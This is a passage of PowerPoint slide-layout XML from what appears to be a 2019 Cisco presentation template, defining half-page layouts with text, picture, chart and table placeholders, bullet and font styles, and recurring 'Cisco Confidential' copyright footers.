                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="460364" indent="-126997">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="628634" indent="-134935">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="739757" indent="-115885">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="12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dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39346808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Half_Page_Blank">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8092"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4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462301" y="1665182"/>
            <a:ext cx="3662024" cy="2925868"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="174625" indent="-117475">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1110"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="288925" indent="-114300">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="403225" indent="-114300">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="631825" indent="-114300">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741653"/>
            <a:ext cx="35683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2019  Cisco and/or its affiliates. All rights reserved.   Cisco Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{867C804D-BB74-8D4A-99FD-E8BFDFD08D31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8092"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9" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D7B4841-0D50-914A-B78E-2A20E9E794B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741653"/>
            <a:ext cx="35683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4083552610"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="4" pos="288">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" pos="259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Half_Page_Text">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169863" indent="-169863">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="228600" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="346075" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="457200" indent="-117475">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="574675" indent="-117475">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="744538" indent="-112713">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604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p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>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2019  Cisco and/or its affiliates. All rights reserved.   Cisco Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD6C03D7-2FB5-5B47-A110-F7FC1646A8E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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9" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5F4B0A-1A63-AD4D-A12A-077854644DAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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919013968"/>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4" pos="2675">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="219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Half_Page_Text_2 column">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mj-lt"/>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5097463" y="510540"/>
            <a:ext cx="3551237" cy="4080510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="6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37766" y="1659842"/>
            <a:ext cx="3808797" cy="2931208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="16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4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>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2019  Cisco and/or its affiliates. All rights reserved.   Cisco Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00A9596B-E7F3-574E-9B08-45C3FD324A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91EFBFC5-ACD7-6B4C-84C5-0118C6A2DBA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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2058021959"/>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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2174CE14-8A11-2B41-A03B-2BF00F62FC93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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19590753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_Half_Page_Picture_Caption">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333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a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741653"/>
            <a:ext cx="2863168"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2019  Cisco and/or its affiliates. All rights reserved.   Cisco Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BA1A0C-282C-1B4E-B241-0058C9E74DEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="459342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1" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F657B103-71ED-8C41-849C-B0084190FDEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741653"/>
            <a:ext cx="2863168"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394520353"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="8" orient="horz" pos="1044">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="264">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" orient="horz" pos="2193">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" pos="2675">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" pos="320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5_Half_Page_Picture">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3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437766" y="1655763"/>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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741653"/>
            <a:ext cx="32635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2019  Cisco and/or its affiliates. All rights reserved.   Cisco Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8A587DC-C309-5F4E-88AF-B5DB24452B89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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9" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0576A426-7EF0-CE4B-BFA8-5DCE2B23330F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741653"/>
            <a:ext cx="32635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228368028"/>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Half_Page_Headline Only">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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477678" y="4741653"/>
            <a:ext cx="2946839"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2019  Cisco and/or its affiliates. All rights reserved.   Cisco Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{297E478A-D8D2-F14B-B9AE-66C74828B78E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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6" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABA3ABBD-28AC-F647-B92D-F5B7F9F45FB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477678" y="4741653"/>
            <a:ext cx="2946839"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2751455940"/>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7_Half_Page_Picture_Full">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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741653"/>
            <a:ext cx="32994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2019  Cisco and/or its affiliates. All rights reserved.   Cisco Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6910C1EB-AF4E-4F40-83A5-BF527E409768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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9" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2CF1839-941F-AD47-A8CA-777FCB1AFCB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741653"/>
            <a:ext cx="32994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617498578"/>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8_Half_Page_Chart">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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477678" y="4741653"/>
            <a:ext cx="3179921"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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A076B8ED-126F-1041-94A6-0061F3363BBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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9" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E3D5C7-7932-C349-BE7D-DA37F4D1C1B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477678" y="4741653"/>
            <a:ext cx="3179921"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2745071787"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="4" pos="2675">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="3206">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" orient="horz" pos="219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9_Half_Page_Table">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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477678" y="4741653"/>
            <a:ext cx="3407027"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2019  Cisco and/or its affiliates. All rights reserved.   Cisco Confidential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{652ED76E-8086-184A-8AB6-304FAE5F7B49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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9" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D3B076B-1609-704D-8411-135F63FADB86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477678" y="4741653"/>
            <a:ext cx="3407027"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4125794122"/>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6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3762994" y="2129076"/>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 name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
